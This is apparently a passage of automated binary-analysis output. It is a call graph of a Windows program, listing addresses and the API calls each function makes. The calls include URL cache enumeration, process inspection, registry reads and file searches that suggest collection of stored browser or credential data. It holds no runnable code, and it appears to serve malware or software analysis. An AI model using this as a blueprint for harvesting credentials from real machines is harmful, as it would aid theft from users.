wcscat 37861->37863 37862->37858 37862->37859 37863->37862 37865 444732 37864->37865 37866 444728 DeleteObject 37864->37866 37876 409cc3 37865->37876 37866->37865 37868 412551 37869 4010f9 37868->37869 37870 401130 37869->37870 37871 401134 GetModuleHandleW LoadIconW 37870->37871 37872 401107 wcsncat 37870->37872 37873 40a7be 37871->37873 37872->37870 37874 40a7d2 37873->37874 37874->37801 37874->37874 37875->37798 37879 409bfd memset wcscpy 37876->37879 37878 409cdb CreateFontIndirectW 37878->37868 37879->37878 37880->37808 37882 40aa14 37881->37882 37883 40aa0a free 37881->37883 37882->37816 37883->37882 37885 40a8eb 37884->37885 37886 40a8df wcslen 37884->37886 37887 40a906 free 37885->37887 37888 40a90f 37885->37888 37886->37885 37892 40a919 37887->37892 37889 4099f4 3 API calls 37888->37889 37889->37892 37890 40a932 37894 4099f4 3 API calls 37890->37894 37891 40a929 free 37893 40a93e memcpy 37891->37893 37892->37890 37892->37891 37893->37808 37895 40a93d 37894->37895 37895->37893 37897 409a41 37896->37897 37898 4099fb malloc 37896->37898 37897->37808 37900 409a37 37898->37900 37901 409a1c 37898->37901 37900->37808 37902 409a30 free 37901->37902 37903 409a20 memcpy 37901->37903 37902->37900 37903->37902 37905 40a9e7 37904->37905 37906 40a9dc free 37904->37906 37908 4099f4 3 API calls 37905->37908 37907 40a9f2 37906->37907 37907->37814 37908->37907 37933 409bca GetModuleFileNameW 37909->37933 37911 40dce6 wcsrchr 37912 40dcf5 37911->37912 37913 40dcf9 wcscat 37911->37913 37912->37913 37913->37822 37934 44db70 37914->37934 37918 40dbfd 37937 4447d9 37918->37937 37921 40dc34 wcscpy wcscpy 37963 40d6f5 37921->37963 37922 40dc1f wcscpy 37922->37921 37925 40d6f5 3 API calls 37926 40dc73 37925->37926 37927 40d6f5 3 API calls 37926->37927 37928 40dc89 37927->37928 37929 40d6f5 3 API calls 37928->37929 37930 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37929->37930 37969 40da80 37930->37969 37933->37911 37935 40dbb4 memset memset 37934->37935 37936 409bca GetModuleFileNameW 37935->37936 37936->37918 37939 4447f4 37937->37939 37938 40dc1b 37938->37921 37938->37922 37939->37938 37940 444807 ??2@YAPAXI 37939->37940 37941 44481f 37940->37941 37942 444873 _snwprintf 37941->37942 37943 4448ab wcscpy 37941->37943 37976 44474a 8 API calls 37942->37976 37945 4448bb 37943->37945 37977 44474a 8 API calls 37945->37977 37946 4448a7 37946->37943 37946->37945 37948 4448cd 37978 44474a 8 API calls 37948->37978 37950 4448e2 37979 44474a 8 API calls 37950->37979 37952 4448f7 37980 44474a 8 API calls 37952->37980 37954 44490c 37981 44474a 8 API calls 37954->37981 37956 444921 37982 44474a 8 API calls 37956->37982 37958 444936 37983 44474a 8 API calls 37958->37983 37960 44494b 37984 44474a 8 API calls 37960->37984 37962 444960 ??3@YAXPAX 37962->37938 37964 44db70 37963->37964 37965 40d702 memset GetPrivateProfileStringW 37964->37965 37966 40d752 37965->37966 37967 40d75c WritePrivateProfileStringW 37965->37967 37966->37967 37968 40d758 37966->37968 37967->37968 37968->37925 37970 44db70 37969->37970 37971 40da8d memset 37970->37971 37972 40daac LoadStringW 37971->37972 37973 40dac6 37972->37973 37973->37972 37975 40dade 37973->37975 37985 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37973->37985 37975->37755 37976->37946 37977->37948 37978->37950 37979->37952 37980->37954 37981->37956 37982->37958 37983->37960 37984->37962 37985->37973 37996 409b98 GetFileAttributesW 37986->37996 37988 40daea 37989 40db63 37988->37989 37990 40daef wcscpy wcscpy GetPrivateProfileIntW 37988->37990 37989->37757 37997 40d65d GetPrivateProfileStringW 37990->37997 37992 40db3e 37998 40d65d GetPrivateProfileStringW 37992->37998 37994 40db4f 37999 40d65d GetPrivateProfileStringW 37994->37999 37996->37988 37997->37992 37998->37994 37999->37989 38035 40eaff 38000->38035 38004 411ae2 memset 38003->38004 38005 411b8f 38003->38005 38076 409bca GetModuleFileNameW 38004->38076 38017 411a8b 38005->38017 38007 411b0a wcsrchr 38008 411b22 wcscat 38007->38008 38009 411b1f 38007->38009 38077 414770 wcscpy wcscpy wcscpy CloseHandle 38008->38077 38009->38008 38011 411b67 38078 402afb 38011->38078 38015 411b7f 38134 40ea13 SendMessageW memset SendMessageW 38015->38134 38018 402afb 27 API calls 38017->38018 38019 411ac0 38018->38019 38020 4110dc 38019->38020 38021 41113e 38020->38021 38026 4110f0 38020->38026 38159 40969c LoadCursorW SetCursor 38021->38159 38023 411143 38160 4032b4 38023->38160 38178 444a54 38023->38178 38024 4110f7 _wcsicmp 38024->38026 38025 411157 38027 40ada2 _wcsicmp 38025->38027 38026->38021 38026->38024 38181 410c46 10 API calls 38026->38181 38030 411167 38027->38030 38028 4111af 38030->38028 38031 4111a6 qsort 38030->38031 38031->38028 38034->37834 38036 40eb10 38035->38036 38049 40e8e0 38036->38049 38039 40eb6c memcpy memcpy 38040 40ebe1 38039->38040 38041 40ebb7 38039->38041 38040->38039 38042 40ebf2 ??2@YAPAXI ??2@YAPAXI 38040->38042 38041->38040 38043 40d134 16 API calls 38041->38043 38044 40ec2e ??2@YAPAXI 38042->38044 38047 40ec65 38042->38047 38043->38041 38044->38047 38059 40ea7f 38047->38059 38048 402f49 38048->37834 38050 40e8f2 38049->38050 38051 40e8eb ??3@YAXPAX 38049->38051 38052 40e900 38050->38052 38053 40e8f9 ??3@YAXPAX 38050->38053 38051->38050 38054 40e911 38052->38054 38055 40e90a ??3@YAXPAX 38052->38055 38053->38052 38056 40e931 ??2@YAPAXI ??2@YAPAXI 38054->38056 38057 40e921 ??3@YAXPAX 38054->38057 38058 40e92a ??3@YAXPAX 38054->38058 38055->38054 38056->38039 38057->38058 38058->38056 38060 40aa04 free 38059->38060 38061 40ea88 38060->38061 38062 40aa04 free 38061->38062 38063 40ea90 38062->38063 38064 40aa04 free 38063->38064 38065 40ea98 38064->38065 38066 40aa04 free 38065->38066 38067 40eaa0 38066->38067 38068 40a9ce 4 API calls 38067->38068 38069 40eab3 38068->38069 38070 40a9ce 4 API calls 38069->38070 38071 40eabd 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eac7 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40ead1 38074->38075 38075->38048 38076->38007 38077->38011 38135 40b2cc 38078->38135 38080 402b0a 38081 40b2cc 27 API calls 38080->38081 38082 402b23 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 free 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 free 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab free free 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab free free 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab free free 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 38283 445d54 _wcsicmp 38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab free free 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 445389 255 API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab free free 38382->38778 38384 40c788 38779 40b1ab free free 38384->38779 38386 40c790 38780 40b1ab free free 38386->38780 38388 40c798 38389 40aa04 free 38388->38389 38390 40c7a0 38389->38390 38781 40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 38409->38835 38837 40c634 47 API calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 38419 40be26 wcsncmp 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab free free 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 4099c6 2 API calls 38474->38475 38475->38468 38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab free free 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 39123 409b98 GetFileAttributesW 38533->39123 38536 408953 38536->38251 38537 408987 38538 4089a1 38537->38538 38539 40898c 38537->38539 39125 409b98 GetFileAttributesW 38538->39125 39124 408560 29 API calls 38539->39124 38542 4089ad 38543 4089b2 38542->38543 38544 4089c7 38542->38544 39126 408560 29 API calls 38543->39126 39127 409b98 GetFileAttributesW 38544->39127 38547 4089d3 38547->38536 38548 4089d8 38547->38548 39128 408560 29 API calls 38548->39128 38551 40b633 free 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf free 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab free free 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab free free 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 free 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 free 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39667 409b98 GetFileAttributesW 38757->39667 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39668 409b98 GetFileAttributesW 38765->39668 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab free free 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 